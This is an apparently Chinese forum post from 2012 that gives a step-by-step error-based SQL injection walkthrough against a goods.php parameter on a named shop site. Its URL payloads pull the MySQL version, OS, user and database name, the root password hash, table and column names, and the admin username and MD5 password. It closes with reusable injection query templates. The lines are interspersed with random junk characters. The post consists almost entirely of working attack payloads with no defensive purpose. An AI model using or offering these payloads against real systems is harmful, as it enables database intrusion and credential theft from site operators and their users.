判断版本号 ! a2 q8 G6 a6 ]. @' r* g2 A7 Q9 z; ?3 B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 {: m6 a1 P, y6 P+ w/ J& v) s' q
6 Y1 l4 v& u0 g8 n, s
判断系统8 e$ i4 w' X, O p; I
- n" Y% d7 p7 Z% c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* A6 T5 d4 i- C4 E9 G* k d
& c5 [6 ~4 w1 p* h2 @( e
" G ~+ _8 n$ J; S
2 w/ z; a: }7 `8 r. v9 @当前 user()% R9 x5 F4 P) J% i
7 V( P9 n7 H( U* O) @: V# j$ mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 p7 |" d3 B! u4 L* k
' b+ ]5 h! o8 @; m, f, B$ d1 t) H, I0 P7 V3 Z
! K/ f; o; ], J' |当前 database()$ G, Z: `5 i2 }! M. K+ \! ~6 U
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, ~' p2 r: u9 a3 ^
7 w- M, a% k6 Y' F+ B" Q0 S, W0 s* P4 g* K9 U
7 `! L- E2 e; }" E( l9 c
# N7 o8 ^9 y Kroot hash$ ~+ U/ ^) i+ f A( \
- T5 q0 ]1 _; N) Z3 |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 u* U; {" ~- Z4 e3 |1 B7 W( @! m, L; o5 W. E: L5 J
6 m. Y/ l/ s7 m# Y3 e9 m
9 B5 [ a: Y! ?1 G( f* @* q5 E当前 数据库表名5 p, E& w3 Q# G8 ^: P
0 T% E+ N7 R/ l1 x \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& ]$ |, }; d1 H5 @8 L2 ^/ x. M
, o+ P+ m9 ?/ U5 }) \+ Q; D$ n
: t2 P" b0 ]; `7 g) m K/ h
! f7 `1 `. ]) ]当前 数据库 user_name 字段, z" j8 c! Q; v3 m$ N& {; O
0 s, U; z5 C, F+ N6 ] X
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! J. o) X# k a5 M8 G' R' k' J
5 I) Z; K+ s- V+ R1 \; [8 S( U当前 数据库 字段 password
2 Q! y3 T: f% F, S: [6 Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) \8 ?; e) j6 g: i/ q N+ K( k9 l; U; x$ I% y% I% Z5 m
" D. e1 g7 p. S3 g) E% C2 d
! H+ L' W( R6 p1 P获得 admin passwd(md5)
; T. v7 v! D7 S+ I0 c9 y
; [2 L, M6 s2 L8 l# H( A
, [9 n- ^- R, m6 b& z, F6 L, D' lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' Z( Y, E" B9 K2 E$ S H+ X7 o
& v* f. o3 h2 S/ \" T6 m3 v报错注射+ v; O8 j7 \( b" `" F7 n4 T
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, F- Q0 {& C' [0 s3 y, F# k
- l# d8 E' ` _% `) {* k3 gSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
( G/ a5 O5 C: G: R3 L
- d ]3 F$ v5 @4 A) Oand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
分享
支持
反对